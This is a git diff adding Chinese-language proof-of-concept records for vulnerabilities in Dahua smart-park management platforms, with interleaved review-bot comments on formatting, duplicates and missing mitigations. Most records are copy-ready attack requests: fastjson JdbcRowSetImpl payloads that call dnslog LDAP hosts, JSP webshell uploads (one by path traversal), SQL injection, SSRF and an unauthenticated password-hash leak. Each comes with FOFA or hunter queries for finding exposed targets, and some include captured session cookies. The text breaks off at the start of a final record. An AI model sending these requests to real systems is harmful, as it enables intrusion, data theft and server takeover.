+Accept-Encoding: gzip, deflate, br + +{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://tcpj5b.dnslog.cn","autoCommit":true}}} +``` + +![1701837472770-9787e19a-53f3-4259-a324-e80ff36b084b.png](./img/pOtHG7nJ8gFl98LB/1701837472770-9787e19a-53f3-4259-a324-e80ff36b084b-860944.png) + +![1701837487031-7b43ed54-fcc2-4079-9e5a-7d3bce88fb2a.png](./img/pOtHG7nJ8gFl98LB/1701837487031-7b43ed54-fcc2-4079-9e5a-7d3bce88fb2a-784274.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/il26hyyl70fmzm9e> \ No newline at end of file diff --git a/大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞.md b/大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞.md new file mode 100644 index 0000000..f48df3a --- /dev/null +++ b/大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞.md 
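Review bot: the title and summary say 远程命令执行 / 获取服务器权限, but what the request and screenshots actually demonstrate is an outbound LDAP lookup triggered through a `com.sun.rowset.JdbcRowSetImpl` `@type` in the JSON body, i.e. unsafe deserialization with a JNDI callback; classify it that way and note that the mitigation for operators who cannot patch is to deny outbound LDAP/RMI from the application host. `ldap://tcpj5b.dnslog.cn` is a real third-party callback hostname captured at test time and should be a placeholder such as `ldap://{dnslog}` (the duplicate file earlier in this commit at least uses `ldap://x.x.x.x`). The `<font style="color:rgb(51, 51, 51);">` wrapper around the 四、漏洞复现 sentence is HTML residue that should be removed.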
@@ -0,0 +1,48 @@ +# 大华智慧园区综合管理平台devicePoint_addImgIco任意文件上传漏洞 + +# 一、漏洞描述 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 大华智慧园区综合管理平台存在文件上传漏洞,攻击者可以通过devicePoint_addImgIco接口任意上传文件,导致系统被攻击与控制。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ FOFA:`app=”dahua-智慧园区综合管理平台”` + +![1689521413401-0fcf65cb-53cc-4666-af1d-1dc09204909c.png](./img/hi1qO8cn6s8WakbW/1689521413401-0fcf65cb-53cc-4666-af1d-1dc09204909c-329370.png) + ++ 登陆页面: + +![1689521436792-cc9eee7b-0158-4165-98e2-cb02571c6b37.png](./img/hi1qO8cn6s8WakbW/1689521436792-cc9eee7b-0158-4165-98e2-cb02571c6b37-667321.png) + +# 四、漏洞复现 +构造如下数据包: + +```plain +POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 +Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT +User-Agent: Java/1.8.0_345 +Host: 127.0.0.1:8009 +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 223 +Connection: close + +--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT +Content-Disposition: form-data; name="upload"; filename="1ndex.jsp" +Content-Type: application/octet-stream +Content-Transfer-Encoding: binary + +123 +--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- +``` + +![1689521496391-6cc01c58-3eaf-4f41-979e-cd73555e1a8c.png](./img/hi1qO8cn6s8WakbW/1689521496391-6cc01c58-3eaf-4f41-979e-cd73555e1a8c-471004.png) + +上传文件访问地址:`http://127.0.0.1:8314/upload/emap/society_new/ico_res_221b04b177b8_on.jsp` + +![1689521515458-6cc6cba2-23aa-48a9-935d-544867a65246.png](./img/hi1qO8cn6s8WakbW/1689521515458-6cc6cba2-23aa-48a9-935d-544867a65246-774167.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hfgy041afmv0g04c> \ No newline at end of file diff --git a/大华智慧园区综合管理平台getGroupInfoListByGroupIdSQL注入漏洞.md b/大华智慧园区综合管理平台getGroupInfoListByGroupIdSQL注入漏洞.md new file mode 100644 index 0000000..f34c061 --- /dev/null +++ b/大华智慧园区综合管理平台getGroupInfoListByGroupIdSQL注入漏洞.md 
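Review bot: the FOFA query in 三、资产测绘 uses curly quotes, `app=”dahua-智慧园区综合管理平台”`, which the search engine will not parse as a string literal; it needs straight double quotes as in the other files. The request uses `Host: 127.0.0.1:8009` while the 上传文件访问地址 line points at port 8314, and the file name `ico_res_221b04b177b8_on.jsp` is clearly server-generated; the record should say that the stored name is assigned by the server and varies per upload rather than presenting one instance as the path. Also `登陆页面` here versus `登录页面` in the sibling files: keep the spelling consistent.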
@@ -0,0 +1,54 @@ +# 大华智慧园区综合管理平台getGroupInfoListByGroupId SQL注入漏洞 + +# 一、漏洞简介 + “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` + +![1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad.png](./img/HyCfpnh12vPSlAOZ/1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad-892669.png) + ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/HyCfpnh12vPSlAOZ/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-055362.png) + +# 四、漏洞复现 +```plain +POST /portal/services/clientServer HTTP/1.1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +SOAPAction: +Content-Type: text/xml;charset=UTF-8 +Host: {hostname} +Content-Length: 509 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:cli="http://clientServer.webservice.dssc.dahua.com"> + <soapenv:Header/> + <soapenv:Body> + <cli:getGroupInfoListByGroupId> + <!--type: string--> + <arg0>5398) UNION ALL SELECT 5336,5336,5336,5336,CONCAT(0x7178787a71,IFNULL(CAST(111*111 AS NCHAR),0x20),0x7171717871)-- -</arg0> + <!--type: long--> + <arg1>10</arg1> + </cli:getGroupInfoListByGroupId> + </soapenv:Body> +</soapenv:Envelope> +``` + +![1702740228771-97951741-ca39-45d7-9bbe-523aec3c6b2d.png](./img/HyCfpnh12vPSlAOZ/1702740228771-97951741-ca39-45d7-9bbe-523aec3c6b2d-553522.png) + +```plain +qxxzq12321qqqxq +``` + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/mwwzf1bqn91wm5nk> \ No newline at end of file 
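Review bot: the bare `qxxzq12321qqqxq` block after the screenshot is given without explanation; state that it is the expected marker in the response, formed from the `CONCAT` markers `0x7178787a71` (qxxzq) and `0x7171717871` (qqqxq) around the `111*111` result, so the success criterion is documented in text. As with the deleteBulletin record, the 一、漏洞简介 boilerplate should name the injection point (`arg0` of `getGroupInfoListByGroupId` on /portal/services/clientServer), and the request's lack of a session cookie, which backs the 远程未授权 claim, should be stated rather than inferred.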
diff --git a/大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md b/大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md new file mode 100644 index 0000000..c799b80 --- /dev/null +++ b/大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md @@ -0,0 +1,33 @@ +# 大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞 + +大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞,未经授权的攻击者可以上传恶意Webshell的JSP文件,可以进行RCE利用。 + +## fofa + +```javascript +app="dahua-智慧园区综合管理平台" +``` + +## poc + +```javascript +POST /emap/devicePoint_addImgIco?hasSubsystem=true HTTP/1.1 +Content-Type: multipart/form-data; boundary=A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT +User-Agent: Java/1.8.0_345 +Host: +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Content-Length: 229 +Connection: close + +--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT +Content-Disposition: form-data; name="upload"; filename="1.jsp" +Content-Type: application/octet-stream +Content-Transfer-Encoding: binary + +123456 +--A9-oH6XdEkeyrNu4cNSk-ppZB059oDDT-- +``` + +![image-20241008142600054](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410081426265.png) + +文件路径 `http://ip:port/upload/emap/society_new/`+文件名 \ No newline at end of file diff --git a/大华智慧园区综合管理平台image存在ssrf漏洞.md b/大华智慧园区综合管理平台image存在ssrf漏洞.md new file mode 100644 index 0000000..320a9c5 --- /dev/null +++ b/大华智慧园区综合管理平台image存在ssrf漏洞.md 
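Review bot: 大华智慧园区综合管理平台hasSubsystem存在文件上传漏洞.md is a duplicate of the devicePoint_addImgIco record immediately above it: same `POST /emap/devicePoint_addImgIco?hasSubsystem=true`, same multipart boundary, same `upload` part, differing only in the file name and body. The title also names a query parameter (`hasSubsystem`) rather than the action, which makes the duplication harder to spot; fold this into the devicePoint_addImgIco file. The FOFA query and the HTTP request are both fenced as ```javascript, the `Host:` header is empty without being marked as a placeholder, and the file has no `> 更新` / `> 原文` footer, so unlike its sibling it records neither source nor date.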
@@ -0,0 +1,35 @@ +# 大华智慧园区综合管理平台image存在ssrf漏洞 + +# 一、漏洞简介 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台image存在ssrf漏洞。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/DOxfwLpWEXM6MdBG/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-825024.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/DOxfwLpWEXM6MdBG/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-393106.png) + +# 四、漏洞复现 +```plain +GET /ipms/imageConvert/image?fileUrl=http://6nqhen.dnslog.cn/1.jpg HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Connection: close +Upgrade-Insecure-Requests: 1 +``` + +![1703413934936-57322599-bfc5-4c8b-856f-2df6401f202c.png](./img/DOxfwLpWEXM6MdBG/1703413934936-57322599-bfc5-4c8b-856f-2df6401f202c-638099.png) + +![1703413952204-847b65eb-ac46-4b8d-b721-9e03d9555c50.png](./img/DOxfwLpWEXM6MdBG/1703413952204-847b65eb-ac46-4b8d-b721-9e03d9555c50-451554.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lz57tt4k7pi5gqem> \ No newline at end of file diff --git a/大华智慧园区综合管理平台pay远程命令执行.md b/大华智慧园区综合管理平台pay远程命令执行.md new file mode 100644 index 0000000..2e65325 --- /dev/null +++ b/大华智慧园区综合管理平台pay远程命令执行.md 
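Review bot: `fileUrl=http://6nqhen.dnslog.cn/1.jpg` embeds a captured callback hostname; use a placeholder and say in text that the check is an outbound request from the server to the supplied URL. The summary should spell out the impact and the fix rather than repeating the title: /ipms/imageConvert/image fetches an arbitrary `fileUrl`, so the defender-side signature is this route with a non-local `fileUrl`, and the mitigation is an allowlist of permitted hosts and schemes plus egress restrictions on the application host. The record still lists no affected version or vendor reference.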
@@ -0,0 +1,35 @@ +# 大华智慧园区综合管理平台pay 远程命令执行 + +# 一、漏洞简介 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台pay远程命令执行,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/wn8K3RjMTMfb0sEx/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-175675.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/wn8K3RjMTMfb0sEx/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-210923.png) + +# 四、漏洞复现 +```plain +POST /ipms/barpay/pay HTTP/1.1 +Host: {hostname} +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML,like Gecko) Version/12.0.3 Safari/605.1.15 +Connection: close +Content-Length: 127 +Accept-Encoding: gzip, deflate +Cmd: whoami +Content-Type: application/json + +{"@type": "com.sun.rowset.JdbcRowSetImpl", "dataSourceName": "ldap://uh8aga.dnslog.cn", "autoCommit": true} +``` + +![1703413736105-efd77f3a-f2c3-430a-be05-31c15cd54cb7.png](./img/wn8K3RjMTMfb0sEx/1703413736105-efd77f3a-f2c3-430a-be05-31c15cd54cb7-325893.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/dxg184gk73n2gyt8> \ No newline at end of file diff --git a/大华智慧园区综合管理平台poi任意文件上传漏洞.md b/大华智慧园区综合管理平台poi任意文件上传漏洞.md new file mode 100644 index 0000000..649ef2d --- /dev/null +++ b/大华智慧园区综合管理平台poi任意文件上传漏洞.md 
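Review bot: the request includes a `Cmd: whoami` header that nothing in the record explains and whose effect nothing in the evidence shows; the screenshot demonstrates only the LDAP callback from the `JdbcRowSetImpl` body. Remove the unexplained header from the record (or document exactly what the evidence supports), because as written the title 远程命令执行 overstates the proof and a reader cannot tell which part of the request matters. `ldap://uh8aga.dnslog.cn` should be a placeholder, as in the sibling records, and this is the same deserialization-to-JNDI pattern as the deleteFtp and sendFaceInfo entries, so the three should share one mitigation statement (patch, and block outbound LDAP/RMI from the host).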
@@ -0,0 +1,62 @@ +# 大华智慧园区综合管理平台poi任意文件上传漏洞 + +# 一、漏洞描述 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 <font style="color:rgba(0, 0, 0, 0.9);">大华智慧园区综合管理平台在/emap/webservice/gis/soap/poi接口处存在任意文件上传漏洞,可以利用此漏洞获得webshell。</font> + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/YD6R9DCWkCac1mzy/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-882487.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/YD6R9DCWkCac1mzy/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-782181.png) + +# 四、漏洞复现 +```plain +POST /emap/webservice/gis/soap/poi HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: JSESSIONID=9EC0A731FFF852957C17C91FE2EF24BD +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 683 + +<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" +xmlns:res="http://response.webservice.poi.mapbiz.emap.dahuatech.com/"> +<soapenv:Header/> +<soapenv:Body> +<res:uploadPicFile> +<!--type:string--> +<arg0>/../../1.jsp</arg0> +<!--type:base64Binary--> +<arg1>PCVAcGFnZSBpbXBvcnQ9ImphdmEudGV4dC4qLGphdmEudXRpbC4qLGphdmEuaW8uKiIlPgo8JQpTaW1wbGVEYXRlRm9ybWF0IGRmID0gbmV3IFNpbXBsZURhdGVGb3JtYXQoInl5eS1NTS1kZCBISDptbTpzcyIpOwpvdXQucHJpbnRsbihkZi5mb3JtYXQobmV3IERhdGUoKSkpOwpGaWxlIGZpbGUgPSBuZXcgRmlsZShhcHBsaWNhdGlvbi5nZXRSZWFsUGF0aChyZXF1ZXN0LmdldFNlcnZsZXRQYXRoKCkpKTsKZmlsZS5kZWxldGUoKTsKJT4=</arg1> +</res:uploadPicFile> +</soapenv:Body> 
+</soapenv:Envelope> +``` + +![1694071791341-5248d78f-4c1e-4dd3-8b9e-29c6fd09aabe.png](./img/YD6R9DCWkCac1mzy/1694071791341-5248d78f-4c1e-4dd3-8b9e-29c6fd09aabe-418276.png) + +上传文件位置 + +```plain +http://xx.xx.xx.xx/upload/1.jsp +``` + +![1694071840120-b98410d5-a689-4743-8a5b-e59ad7b99583.png](./img/YD6R9DCWkCac1mzy/1694071840120-b98410d5-a689-4743-8a5b-e59ad7b99583-299337.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bdf3yqzbh9p9h9ev> \ No newline at end of file diff --git a/大华智慧园区综合管理平台searchJsonSQL注入漏洞.md b/大华智慧园区综合管理平台searchJsonSQL注入漏洞.md new file mode 100644 index 0000000..c091c58 --- /dev/null +++ b/大华智慧园区综合管理平台searchJsonSQL注入漏洞.md 
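Review bot: the poi request sends a SOAP envelope with `Content-Type: application/x-www-form-urlencoded`, while the otherwise identical bitmap record uses `text/xml;charset=UTF-8`; if the endpoint really accepts both, say so, otherwise one of the two records is wrong. As with bitmap, the `<arg1>` base64 should be described in text (it decodes to a JSP that prints the current date via `SimpleDateFormat` and then deletes itself), and the real defect, the `<arg0>` path `/../../1.jsp` escaping the upload directory, should be named in the summary. `Cookie: JSESSIONID=9EC0A731...` is a captured session token and the `<font>` wrapper in 一、漏洞描述 is export residue.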
@@ -0,0 +1,41 @@ +# 大华智慧园区综合管理平台searchJson SQL注入漏洞 + +# 一、漏洞简介 + “大华智慧园区综合管理平台”是一款综合管理平台,具备园区运营、资源调配和智能服务等功能。平台意在协助优化园区资源分配,满足多元化的管理需求,同时通过提供智能服务,增强使用体验。大华智慧园区综合管理平台未对用户的输入进行有效的过滤,直接将其拼接进了SQL查询语句中,导致系统出现SQL注入漏洞。远程未授权攻击者可利用此漏洞获取敏感信息,进一步利用可能获取目标系统权限。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` + +![1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad.png](./img/9KTgHf02N5fP6w1g/1691829123219-724bd409-5d1c-4593-88e9-2990fef366ad-737633.png) + ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/9KTgHf02N5fP6w1g/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-887240.png) + +# 四、漏洞复现 +```plain +GET /portal/services/carQuery/getFaceCapture/searchJson/%7B%7D/pageJson/%7B%22orderBy%22:%221%20and%201=updatexml(1,concat(0x7e,(select%20user()),0x7e),1)--%22%7D/extend/%7B%7D HTTP/1.1 +Host: xx.xx.xx.xx +Cookie: JSESSIONID=0B95DCE16676556E16169127452F23E1 +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: none +Sec-Fetch-User: ?1 +Te: trailers +Connection: close +``` + +![1694074042507-ea2e434a-5839-4d4f-9c5f-c93c890625f7.png](./img/9KTgHf02N5fP6w1g/1694074042507-ea2e434a-5839-4d4f-9c5f-c93c890625f7-635909.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/nuyho759ar0isski> \ No newline at end of file diff --git a/大华智慧园区综合管理平台sendFaceInfo远程命令执行.md b/大华智慧园区综合管理平台sendFaceInfo远程命令执行.md new file mode 100644 index 0000000..a63300c --- /dev/null +++ b/大华智慧园区综合管理平台sendFaceInfo远程命令执行.md 
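Review bot: this is the second searchJson record in the commit (the first is 大华智慧园区综合管理平台-searchJson-SQL注入漏洞.md near the top), and the two use different probe expressions in the `orderBy` value of `pageJson`; consolidate to a single file and state the success criterion once in text rather than in two diverging screenshots. The `Cookie: JSESSIONID=0B95DCE1...` value is a captured token and should be redacted, and the 一、漏洞简介 boilerplate should identify the injection point (the `orderBy` key inside the URL-encoded `pageJson` path segment), which is what a WAF rule or log search needs.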
@@ -0,0 +1,36 @@ +# 大华智慧园区综合管理平台sendFaceInfo 远程命令执行 + +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。大华智慧园区综合管理平台sendFaceInfo远程命令执行,攻击者可通过该漏洞获取服务器权限。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/gH4aRxv7rmMOuKxg/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-893238.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/gH4aRxv7rmMOuKxg/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-993966.png) + +# 四、漏洞复现 +```plain +POST /CardSolution/card/face/sendFaceInfo HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 +Content-Length: 216 +Accept-Encoding: gzip +Connection: close +Content-Type: application/json +Testcmd: whoami + +{"ftpUrl":{"e":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"f":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://qq6t3h.dnslog.cn","autoCommit":true}}} +``` + +![1707099788399-a0b536ac-88d2-493d-a289-b56a16136cbc.png](./img/gH4aRxv7rmMOuKxg/1707099788399-a0b536ac-88d2-493d-a289-b56a16136cbc-500956.png) + +![1707099808913-cbbd7047-d6c8-459b-8ce5-66e093aa3b3d.png](./img/gH4aRxv7rmMOuKxg/1707099808913-cbbd7047-d6c8-459b-8ce5-66e093aa3b3d-109428.png) + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/ggwqu2ux26v8ogez> \ No newline at end of file diff --git a/大华智慧园区综合管理平台video任意文件上传漏洞.md b/大华智慧园区综合管理平台video任意文件上传漏洞.md new file mode 100644 index 0000000..5634b20 --- /dev/null +++ b/大华智慧园区综合管理平台video任意文件上传漏洞.md 
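Review bot: this file skips the `# 一、漏洞简介` heading that every sibling record has: the summary paragraph sits directly under the title and the numbering starts at 二、影响版本. The request carries an unexplained `Testcmd: whoami` header with no evidence of any effect, exactly like the `Cmd:` header in the pay record; drop it or document what the screenshots actually show, which is only the LDAP callback from the `JdbcRowSetImpl` body. `ldap://qq6t3h.dnslog.cn` should be a placeholder and the empty `Host:` should be marked as one.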
@@ -0,0 +1,55 @@ +# 大华智慧园区综合管理平台video任意文件上传漏洞 + +# 一、漏洞描述 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。 大华智慧园区综合管理平台存在文件上传漏洞,攻击者可以通过请求publishing/publishing/material/file/video接口任意上传文件,导致系统被攻击与控制。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/WIhLPHsxR0MtfBnz/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-368760.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/WIhLPHsxR0MtfBnz/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-078258.png) + +# 四、漏洞复现 +```plain +POST /publishing/publishing/material/file/video HTTP/1.1 +Content-Type: multipart/form-data; boundary=00content0boundary00 +User-Agent: Java/1.8.0_381 +Host: xx.xx.xx.xx +Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2 +Connection: close +Content-Length: 287 + +--00content0boundary00 +Content-Disposition: form-data; name="Filedata"; filename="1ndex.jsp" + +test +--00content0boundary00 +Content-Disposition: form-data; name="file" + +file +--00content0boundary00 +Content-Disposition: form-data; name="Submit" + +submit +--00content0boundary00-- + +``` + +![1691828397306-98208fcc-6c2f-47b1-9ef5-00ef5a6fa4bf.png](./img/WIhLPHsxR0MtfBnz/1691828397306-98208fcc-6c2f-47b1-9ef5-00ef5a6fa4bf-304986.png) + +上传文件位置: + +```plain +/publishingImg/VIDEO/230812162057144051.jsp +``` + +![1691828467294-b2ffd5e1-6752-43e1-af2c-0c5ace27137c.png](./img/WIhLPHsxR0MtfBnz/1691828467294-b2ffd5e1-6752-43e1-af2c-0c5ace27137c-599009.png) + + + +> 更新: 2024-02-29 23:57:19 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/lggztymnkglaq1p9> \ No newline at end of file diff --git a/大华智慧园区综合管理平台密码泄露漏洞.md b/大华智慧园区综合管理平台密码泄露漏洞.md new file mode 100644 index 0000000..7cf8f4b --- /dev/null +++ b/大华智慧园区综合管理平台密码泄露漏洞.md 
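Review bot: this record and 大华智慧园区综合管理平台-文件上传漏洞.md earlier in the commit describe the same /publishing/publishing/material/file/video upload; keep this one, since it is the only one that records where the file is stored, and point the other at it. The stored path `/publishingImg/VIDEO/230812162057144051.jsp` is a timestamp-derived name, so say that the server assigns the name and that the value shown is one instance. The fenced request ends with a blank line inside the fence after the closing boundary, which should be trimmed so the block matches the declared `Content-Length`.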
@@ -0,0 +1,28 @@ +# 大华智慧园区综合管理平台密码泄露漏洞 + +# 一、漏洞简介 +大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台,旨在为园区提供一站式解决方案,包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。由于敏感目录并未进行鉴权,所以可以直接得到system的密码(采用MD5加密)。 + +# 二、影响版本 ++ 大华智慧园区综合管理平台 + +# 三、资产测绘 ++ hunter:`app.name="Dahua 大华 智慧园区管理平台"` +![1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png](./img/j5J4UTsXNi3QyccW/1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113-147085.png) ++ 登录页面: + +![1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png](./img/j5J4UTsXNi3QyccW/1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138-860009.png) + +# 四、漏洞复现 +```plain +/admin/user_getUserInfoByUserName.action?userName=system +``` + +![1691939932039-c2486925-3f44-4e78-a2c5-49b640dad81d.png](./img/j5J4UTsXNi3QyccW/1691939932039-c2486925-3f44-4e78-a2c5-49b640dad81d-064672.png) + +可通过遍历`userName`参数,获取md5加密的密码, + + + +> 更新: 2024-02-29 23:57:18 +> 原文: <https://www.yuque.com/xiaokp7/ocvun2/qkdoiry1tgrhdk63> \ No newline at end of file diff --git a/大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747).md b/大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747).md new file mode 100644 index 0000000..e3d1372 --- /dev/null +++ b/大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747).md @@ -0,0 +1,26 @@ +# 大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747) + +大华智能云网关注册管理平台SQL注入漏洞(CNVD-2024-38747),允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## fofa + +```javascript 